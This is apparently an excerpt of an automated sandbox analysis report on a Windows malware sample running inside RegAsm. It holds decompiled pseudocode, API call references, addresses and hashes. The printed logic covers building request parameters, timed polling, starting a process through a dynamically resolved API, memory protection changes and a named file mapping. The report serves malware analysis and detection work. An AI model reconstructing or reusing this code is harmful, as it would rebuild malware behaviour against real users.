					_t2 = _t35 + 0x10ab622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d16e, _t34, _t33, _t32, _t31,  *0x10aa02c,  *0x10aa004, _t110);
					_t38 = E010A415C();
					_t39 =  *0x10aa2d4; // 0x235d5a8
					_t3 = _t39 + 0x10ab662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x10aa2d4; // 0x235d5a8
						_t7 = _t92 + 0x10ab66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E010A12E4(_t99);
					_t44 =  *0x10aa2d4; // 0x235d5a8
					_t9 = _t44 + 0x10ab38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x10aa2d4; // 0x235d5a8
					_t11 = _t48 + 0x10ab33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x10aa32c; // 0x34095b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x10aa2d4; // 0x235d5a8
						_t13 = _t88 + 0x10ab685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x10aa37c; // 0x3409630
					_a28 = E010A3770(0x10aa00a, _t105 + 4);
					_t55 =  *0x10aa31c; // 0x34095e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x10aa2d4; // 0x235d5a8
						_t16 = _t84 + 0x10ab8e9; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x10aa318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x10aa2d4; // 0x235d5a8
						_t18 = _t81 + 0x10ab8e2; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x10aa290, _t107, 0x800);
						if(_t98 != _t107) {
							E010A530B(GetTickCount());
							_t62 =  *0x10aa37c; // 0x3409630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x10aa37c; // 0x3409630
							__imp__(_t66 + 0x40);
							_t68 =  *0x10aa37c; // 0x3409630
							_t69 = E010A277F(1, _t103, _t117,  *_t68); // executed
							_t115 = _t69;
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x10a92ac);
								_push(_t115);
								_t108 = E010A347A();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E010A318D(0xffffffffffffffff, _t98, _v12, _v8); // executed
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E010A315F();
									}
									HeapFree( *0x10aa290, 0, _v24);
								}
								HeapFree( *0x10aa290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x10aa290, _t107, _t98);
						}
						HeapFree( *0x10aa290, _t107, _a20);
					}
					RtlFreeHeap( *0x10aa290, _t107, _t117); // executed
				}
				return _v16;
			}

0x010a2c37
0x010a2c4b
0x010a2c4d
0x010a2c5b
0x010a2c5f
0x010a2c67
0x010a2c6f
0x010a2c6f
0x010a2c71
0x010a2c7d
0x010a2c8c
0x010a2c91
0x010a2c94
0x010a2c99
0x010a2c9c
0x010a2ca1
0x010a2ca4
0x010a2cb0
0x010a2cbd
0x010a2cbf
0x010a2cc5
0x010a2cca
0x010a2cd5
0x010a2cd7
0x010a2cda
0x010a2ce0
0x010a2ce2
0x010a2ceb
0x010a2cf6
0x010a2cf8
0x010a2cfb
0x010a2cfb
0x010a2cfd
0x010a2d04
0x010a2d09
0x010a2d16
0x010a2d18
0x010a2d1d
0x010a2d2b
0x010a2d2d
0x010a2d32
0x010a2d37
0x010a2d3a
0x010a2d3f
0x010a2d4a
0x010a2d4c
0x010a2d4f
0x010a2d4f
0x010a2d51
0x010a2d64
0x010a2d68
0x010a2d6d
0x010a2d71
0x010a2d74
0x010a2d79
0x010a2d84
0x010a2d86
0x010a2d89
0x010a2d89
0x010a2d8b
0x010a2d92
0x010a2d95
0x010a2d9a
0x010a2da4
0x010a2da6
0x010a2dad
0x010a2dc5
0x010a2dc9
0x010a2dd5
0x010a2dda
0x010a2de3
0x010a2df4
0x010a2df8
0x010a2e01
0x010a2e07
0x010a2e0f
0x010a2e14
0x010a2e21
0x010a2e27
0x010a2e2f
0x010a2e35
0x010a2e3b
0x010a2e3f
0x010a2e43
0x010a2e49
0x010a2e4d
0x010a2e54
0x010a2e5b
0x010a2e5f
0x010a2e6a
0x010a2e71
0x010a2e75
0x010a2e7e
0x010a2e7e
0x010a2e8f
0x010a2e8f
0x010a2e9e
0x010a2ea4
0x010a2ea4
0x010a2eae
0x010a2eae
0x010a2ebf
0x010a2ebf
0x010a2ecd
0x010a2ecd
0x010a2edd

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,00000000), ref: 010A2C55
GetTickCount.KERNEL32 ref: 010A2C69
wsprintfA.USER32 ref: 010A2CB8
wsprintfA.USER32 ref: 010A2CD5
wsprintfA.USER32 ref: 010A2CF6
wsprintfA.USER32 ref: 010A2D14
wsprintfA.USER32 ref: 010A2D29
wsprintfA.USER32 ref: 010A2D4A
wsprintfA.USER32 ref: 010A2D84
wsprintfA.USER32 ref: 010A2DA4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010A2DBF
GetTickCount.KERNEL32 ref: 010A2DCF
RtlEnterCriticalSection.NTDLL(034095F0), ref: 010A2DE3
RtlLeaveCriticalSection.NTDLL(034095F0), ref: 010A2E01

Part of subcall function 010A277F: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A27AA
Part of subcall function 010A277F: lstrlen.KERNEL32(00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A27B2
Part of subcall function 010A277F: strcpy.NTDLL ref: 010A27C9
Part of subcall function 010A277F: lstrcat.KERNEL32(00000000,00000000), ref: 010A27D4
Part of subcall function 010A277F: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010A2E14,?,00000000,010A2E14,00000000,03409630), ref: 010A27F1

StrTrimA.SHLWAPI(00000000,010A92AC,00000000,03409630), ref: 010A2E2F

Part of subcall function 010A347A: lstrlen.KERNEL32(0340887A,00000000,00000000,00000000,010A2E3B,00000000), ref: 010A348A
Part of subcall function 010A347A: lstrlen.KERNEL32(?), ref: 010A3492
Part of subcall function 010A347A: lstrcpy.KERNEL32(00000000,0340887A), ref: 010A34A6
Part of subcall function 010A347A: lstrcat.KERNEL32(00000000,?), ref: 010A34B1

lstrcpy.KERNEL32(00000000,?), ref: 010A2E4D
lstrcat.KERNEL32(00000000,00000000), ref: 010A2E5B
lstrcat.KERNEL32(00000000,00000000), ref: 010A2E5F
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 010A2E8F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 010A2E9E
HeapFree.KERNEL32(00000000,00000000,00000000,03409630), ref: 010A2EAE
HeapFree.KERNEL32(00000000,?), ref: 010A2EBF
RtlFreeHeap.NTDLL(00000000,00000000), ref: 010A2ECD

Strings

Ut, xrefs: 010A2E8F, 010A2E9E, 010A2EAE, 010A2EBF, 010A2ECD

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: Ut
API String ID: 1837416118-8415677
Opcode ID: b8d28ca27904a1e1511e45a6541f2938b739298c253e05f0363c9c99802122c1
Instruction ID: 7d320c6ec30547bc5a97e6146def2a8b06caae62370ec86dd5e3d8ddd82515ca
Opcode Fuzzy Hash: b8d28ca27904a1e1511e45a6541f2938b739298c253e05f0363c9c99802122c1
Instruction Fuzzy Hash: 3A71AE72200A15EFD772DBA8DC48E977BE8EB88340B854525F9C9C3244E63FE815CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F08483, Relevance: 22.6, APIs: 15, Instructions: 130
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,03F1AC26), ref: 03F084AC
RtlDeleteCriticalSection.NTDLL(03F2C2E0), ref: 03F084DF
RtlDeleteCriticalSection.NTDLL(03F2C300), ref: 03F084E6
CloseHandle.KERNEL32(?,?,03F1AC26), ref: 03F08515
ReleaseMutex.KERNEL32(00000520,00000000,?,?,?,03F1AC26), ref: 03F08526
CloseHandle.KERNEL32(?,?,03F1AC26), ref: 03F08532
ResetEvent.KERNEL32(00000000,00000000,?,?,?,03F1AC26), ref: 03F0853E
CloseHandle.KERNEL32(?,?,03F1AC26), ref: 03F0854A
SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,03F1AC26), ref: 03F08550
SleepEx.KERNEL32(00000064,00000001,?,?,03F1AC26), ref: 03F08564
HeapFree.KERNEL32(00000000,00000000,?,?,03F1AC26), ref: 03F08587
RtlRemoveVectoredExceptionHandler.NTDLL(00E7EAD8), ref: 03F085C0
SleepEx.KERNEL32(00000064,00000001,?,?,03F1AC26), ref: 03F085DC
CloseHandle.KERNEL32(043A8580,?,?,03F1AC26), ref: 03F08603
LocalFree.KERNEL32(?,?,03F1AC26), ref: 03F08613

Part of subcall function 03F173A1: GetVersion.KERNEL32(?,00000000,74E5F720,?,03F0849D,00000000,?,?,?,03F1AC26), ref: 03F173C5
Part of subcall function 03F173A1: GetModuleHandleA.KERNEL32(?,043A9759,?,03F0849D,00000000,?,?,?,03F1AC26), ref: 03F173E2
Part of subcall function 03F173A1: GetProcAddress.KERNEL32(00000000), ref: 03F173E9

Part of subcall function 03F038A8: RtlEnterCriticalSection.NTDLL(03F2C300), ref: 03F038B2
Part of subcall function 03F038A8: RtlLeaveCriticalSection.NTDLL(03F2C300), ref: 03F038EE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Handle$CloseCriticalSectionSleep$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
String ID:
API String ID: 1924086638-0
Opcode ID: c480706659bfa9eceb48992a4e56ad2f4f92136e292ded2c628c167ad04ebc24
Instruction ID: 73833704b3cd584c04be1e330905e6f45c7a83852084fecd89c51fb196d7b16d
Opcode Fuzzy Hash: c480706659bfa9eceb48992a4e56ad2f4f92136e292ded2c628c167ad04ebc24
Instruction Fuzzy Hash: 60413132A0020ADFDB30FFADED95A6D77A9EB20791B590025E601E71A8CB719C809B54

Uniqueness

Uniqueness Score: -1.00%

Function 010A6664, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E010A6664(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x10aa298);
					_v20 = 0;
					_v16 = 0;
					L010A7F0C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x10aa2c4; // 0x294
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x10aa2a4 = 5;
						} else {
							_t69 = E010A489D(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x10aa2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E010A3B2B( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E010A20B8(_t73, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x10aa29c);
							goto L21;
						} else {
							__eflags =  *0x10aa2a0; // 0x1
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E010A315F();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x10aa2a0);
								L21:
								L010A7F0C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0x10aa290, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x010a6664
0x010a6676
0x010a6679
0x010a6685
0x010a668d
0x010a6690
0x010a67f6
0x010a6696
0x010a6696
0x010a6698
0x010a669d
0x010a669e
0x010a66a4
0x010a66a7
0x010a66aa
0x010a66b8
0x010a66c3
0x010a66c6
0x010a66c8
0x010a66d5
0x010a66df
0x010a66e3
0x010a66e6
0x010a66eb
0x010a66f6
0x010a66f6
0x010a66ed
0x010a66ed
0x010a66f4
0x00000000
0x00000000
0x010a66f4
0x010a6700
0x00000000
0x010a6703
0x010a6707
0x010a6712
0x010a6712
0x010a6719
0x010a671e
0x010a6725
0x010a672e
0x010a6734
0x010a6737
0x010a673e
0x010a6741
0x00000000
0x00000000
0x010a6743
0x010a6746
0x010a6749
0x010a674c
0x00000000
0x010a674e
0x010a6758
0x010a675d
0x010a675d
0x00000000
0x010a678b
0x010a678b
0x010a6790
0x010a67af
0x010a67b1
0x010a67b6
0x010a67b7
0x00000000
0x010a6792
0x010a6792
0x010a6798
0x00000000
0x010a679a
0x010a679a
0x010a679f
0x010a67a1
0x010a67a6
0x010a67a7
0x010a67bd
0x010a67bd
0x010a67c5
0x010a67d0
0x010a67d3
0x010a67de
0x010a67e0
0x010a67e2
0x010a67e5
0x00000000
0x010a67eb
0x00000000
0x010a67eb
0x010a67e5
0x010a6798
0x00000000
0x010a6790
0x010a6760
0x010a6762
0x010a6765
0x010a6766
0x010a6766
0x010a676a
0x010a6774
0x010a6774
0x010a677a
0x010a677d
0x010a677d
0x010a6783
0x010a6783
0x010a6800
0x00000000

APIs

memset.NTDLL ref: 010A6679
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 010A6685
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 010A66AA
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 010A66C6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010A66DF
RtlFreeHeap.NTDLL(00000000,00000000), ref: 010A6774
CloseHandle.KERNEL32(?), ref: 010A6783
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 010A67BD
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 010A67D3
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010A67DE

Part of subcall function 010A489D: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03409388,00000000,?,74E5F710,00000000,74E5F730), ref: 010A48EC
Part of subcall function 010A489D: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,034093C0,?,00000000,30314549,00000014,004F0053,0340937C), ref: 010A4989
Part of subcall function 010A489D: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010A66F2), ref: 010A499B

GetLastError.KERNEL32 ref: 010A67F0

Strings

Ut, xrefs: 010A6774

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID: Ut
API String ID: 3521023985-8415677
Opcode ID: 9ff508b6054adb783019712bbb88a0dc3e73e17e6fef7f541f980c02fcb16da7
Instruction ID: fe2e64a8fc41e851f5cbc1ad0a483f2948d25e9608220abbf1ca90be8afe7168
Opcode Fuzzy Hash: 9ff508b6054adb783019712bbb88a0dc3e73e17e6fef7f541f980c02fcb16da7
Instruction Fuzzy Hash: F4516B71910229EEDF219FD8DC84DEEBFB8FB05364F944156F451A2284E7768640CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A5C48, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E010A5C48(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E010A2B33(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E010A792E( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x10aa2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x10aa2d4; // 0x235d5a8
					_t18 = _t50 + 0x10ab55b; // 0x73797325
					_t52 = E010A2A8A(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x10aa2d4; // 0x235d5a8
						_t20 = _t53 + 0x10ab73d; // 0x3408ce5
						_t21 = _t53 + 0x10ab0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32); // executed
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x10aa290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E010A2625(_t76);
				goto L12;
			}

0x010a5c51
0x010a5c51
0x010a5c5f
0x010a5c68
0x010a5c6b
0x010a5d7d
0x010a5d84
0x010a5d84
0x010a5c7a
0x010a5c82
0x010a5c87
0x010a5c8a
0x010a5c9f
0x010a5ca5
0x010a5ca6
0x010a5ca9
0x010a5caf
0x010a5cb2
0x010a5cb7
0x010a5cbf
0x010a5cc6
0x010a5ccd
0x010a5cd0
0x010a5d64
0x010a5cd6
0x010a5cd6
0x010a5cdb
0x010a5ce2
0x010a5cf6
0x010a5cfa
0x010a5d4b
0x010a5cfc
0x010a5cfc
0x010a5d03
0x010a5d0a
0x010a5d22
0x010a5d28
0x010a5d2c
0x010a5d46
0x010a5d2e
0x010a5d37
0x010a5d3c
0x010a5d3c
0x010a5d2c
0x010a5d5c
0x010a5d5c
0x010a5cd0
0x010a5d6b
0x010a5d74
0x010a5d78
0x00000000

APIs

Part of subcall function 010A2B33: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,010A5C64,?,?,?,?,00000000,00000000), ref: 010A2B58
Part of subcall function 010A2B33: GetProcAddress.KERNEL32(00000000,7243775A), ref: 010A2B7A
Part of subcall function 010A2B33: GetProcAddress.KERNEL32(00000000,614D775A), ref: 010A2B90
Part of subcall function 010A2B33: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 010A2BA6
Part of subcall function 010A2B33: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 010A2BBC
Part of subcall function 010A2B33: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 010A2BD2

memset.NTDLL ref: 010A5CB2

Part of subcall function 010A2A8A: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,010A5CCB,73797325), ref: 010A2A9B
Part of subcall function 010A2A8A: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 010A2AB5

GetModuleHandleA.KERNEL32(4E52454B,03408CE5,73797325), ref: 010A5CE9
GetProcAddress.KERNEL32(00000000), ref: 010A5CF0
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 010A5D0A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 010A5D28
CloseHandle.KERNEL32(00000000), ref: 010A5D37
CloseHandle.KERNEL32(?), ref: 010A5D3C
GetLastError.KERNEL32 ref: 010A5D40
HeapFree.KERNEL32(00000000,?), ref: 010A5D5C

Strings

Ut, xrefs: 010A5D5C

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID: Ut
API String ID: 91923200-8415677
Opcode ID: b17f89aa47463147553c53652d418c3051ef323ad4f92ef3ce14bdafbbf4038b
Instruction ID: 3f404228bd6438b447a2d9a7d87e478673635ba60d557aa20da6b695e9165d94
Opcode Fuzzy Hash: b17f89aa47463147553c53652d418c3051ef323ad4f92ef3ce14bdafbbf4038b
Instruction Fuzzy Hash: 4A314771A00619EFDB21AFE8DC48EDEBFB8FF08344F504061E285A7110D775AA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F0C9AB, Relevance: 15.1, APIs: 10, Instructions: 117
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0C9F8
VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0CA0A
lstrcpy.KERNEL32(00000000,?), ref: 03F0CA19
VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0CA2A
VirtualProtect.KERNELBASE(?,00000005,00000040,00000400,03F284F0,00000018,03F0D5A8,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000), ref: 03F0CA60
VirtualProtect.KERNELBASE(?,00000004,?,?,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0CA7B
VirtualProtect.KERNEL32(?,00000004,00000040,?,03F284F0,00000018,03F0D5A8,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000), ref: 03F0CA90
VirtualProtect.KERNELBASE(?,00000004,00000040,?,03F284F0,00000018,03F0D5A8,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000), ref: 03F0CABD
VirtualProtect.KERNELBASE(?,00000004,?,?,?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0CAD7
GetLastError.KERNEL32(?,00000000,?,03F217F9,00000000,00000001,?,00000000,00000000,00000000,03F2B928,00000001), ref: 03F0CADE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
String ID:
API String ID: 3676034644-0
Opcode ID: ad97edaf5825675e6b833462577697648245704276013b39ce7ab4c20b05d225
Instruction ID: c3368fb5309a23a364bdbef1e3f983f8836e1f127cfe91f7d2a6ba0e6c52aa2e
Opcode Fuzzy Hash: ad97edaf5825675e6b833462577697648245704276013b39ce7ab4c20b05d225
Instruction Fuzzy Hash: 82412E7190070ADFDB31DFA9CC54EAAB7B5FB08310F048615E656AB5E0D774E805DB20

Uniqueness

Uniqueness Score: -1.00%

Function 010A562B, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E010A562B(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L010A7F06();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x10aa2d4; // 0x235d5a8
				_t5 = _t13 + 0x10ab84d; // 0x3408df5
				_t6 = _t13 + 0x10ab580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L010A7BEA();
				_t17 = CreateFileMappingW(0xffffffff, 0x10aa2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x010a562b
0x010a5633
0x010a5637
0x010a563d
0x010a5642
0x010a5647
0x010a564a
0x010a564d
0x010a5652
0x010a5653
0x010a5656
0x010a565b
0x010a5662
0x010a566c
0x010a566e
0x010a566f
0x010a5672
0x010a568e
0x010a5694
0x010a5698
0x010a56e6
0x010a569a
0x010a56a7
0x010a56b7
0x010a56bf
0x010a56d1
0x010a56d5
0x00000000
0x00000000
0x010a56c1
0x010a56c4
0x010a56c9
0x010a56cb
0x010a56cb
0x010a56a9
0x010a56ab
0x010a56d7
0x010a56d8
0x010a56d8
0x010a56a7
0x010a56ed

APIs

